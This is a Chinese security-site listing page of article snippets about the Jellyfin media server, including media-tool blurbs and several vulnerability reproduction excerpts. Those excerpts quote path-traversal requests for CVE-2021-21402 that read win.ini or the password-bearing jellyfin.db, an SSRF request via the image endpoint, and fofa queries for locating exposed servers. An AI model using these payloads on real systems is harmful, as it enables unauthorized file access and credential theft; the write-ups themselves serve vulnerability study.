jellyfin | CN-SEC 中文网

安全工具

Tissue：又一款老司机教材刮削神器，支持Jellyfin、Emby、Kodi

Tissue，一个让你告别凌乱教材（自行体会😊）、轻松构建个人学习库的神奇工具！它能够自动下载海报、匹配元数据，让你的教材在Jellyfin、Emby、Kodi等媒体服务器软件中，像书籍一样整齐排列，...

01月27日56 views评论

阅读全文

安全工具

Tube Archivist：一款自托管的油管媒体管理器，支持下载视频和添加到Jellyfin

随着你的油管视频收藏不断增多，查找特定视频可能会变得困难。这就是Tube Archivist发挥作用的地方：通过从油管获取元数据来索引你收藏的视频，你可以方便地通过一个简洁的网页界面离线管理和搜索你存...

04月19日23 views评论

阅读全文

安全闲碎

docker搭建jellyfin部署视频库、私人电视

自述giegie，我没有群晖nas怎么办？哈！你小呆呆啊，这不有树莓派、电脑、手机么你真以为电视盒子不是装了一套嵌入式系统而已啊（如今的电视也嵌入了系统）把你废旧的设备拿出来，又是一台新功能的电视了再...

11月20日103 views评论

阅读全文

安全漏洞

Jellyfin 任意文件读取漏洞（CVE-2021-21402）

fofa语句：title="Jellyfin"我们随便点一个进入接着我们使用POCGET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows...

07月31日77 views评论

阅读全文

安全文章

经典Jellyfin 任意文件读取

术之尽头，炁体源流构造payload：/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/漏洞证明文笔生疏，...

06月17日73 views评论

阅读全文

安全文章

Jellyfin SSRF

无善无恶心之体，有善有恶意之动，知善知恶是良知，为善去恶是格物构造请求POC：http://xxx/Images/Remote?imageUrl=https://www.baidu.com漏洞证明：文...

06月10日43 views评论

阅读全文

安全文章

关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习

漏洞描述：Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造（SSRF）。此漏洞允许攻击者通过构建的 POST 请求访问网络资源和敏感信息。环境及部署说明...

03月17日72 views已关闭评论

阅读全文

安全漏洞

Jellyfin - CVE-2021-21402 任意文件读取漏洞

漏洞背景 Jellyfin允许读取未经身份验证的任意文件漏洞复现祭出fofa关键字title="jellyfin" 有条件的排除蜜罐漏洞利用可以读取未经身份验证的任意文件/Audio/{Id...

08月28日117 views评论

阅读全文

安全文章

Jellyfin任意文件读取复现

Jellyfin任意文件读取复现POC：GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1GET /Videos/anyt...

04月13日78 views评论

阅读全文

安全漏洞

Jellyfin任意文件读取漏洞（CVE-2021-21402）

漏洞简介 Jellyfin 是一个自由的软件媒体系统，用于控制和管理媒体和流媒体。它是 emby 和 plex 的替代品，它通过多...

04月08日380 views评论

阅读全文

安全漏洞

CVE-2021-21402 Jellyfin任意文件读取

FOFA：title="Jellyfin"影响版本：jellyfin<=10.7.0POC1：从服务器下载带有密码的jellyfin.db：GET /Audio/anything/hls/..%...

04月08日212 views评论

阅读全文

Tissue：又一款老司机教材刮削神器，支持Jellyfin、Emby、Kodi

Tube Archivist：一款自托管的油管媒体管理器，支持下载视频和添加到Jellyfin

docker搭建jellyfin部署视频库、私人电视

Jellyfin 任意文件读取漏洞（CVE-2021-21402）

经典Jellyfin 任意文件读取

Jellyfin SSRF

关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习

Jellyfin - CVE-2021-21402 任意文件读取漏洞

Jellyfin任意文件读取复现

Jellyfin任意文件读取漏洞（CVE-2021-21402）

CVE-2021-21402 Jellyfin任意文件读取

在线咨询

微信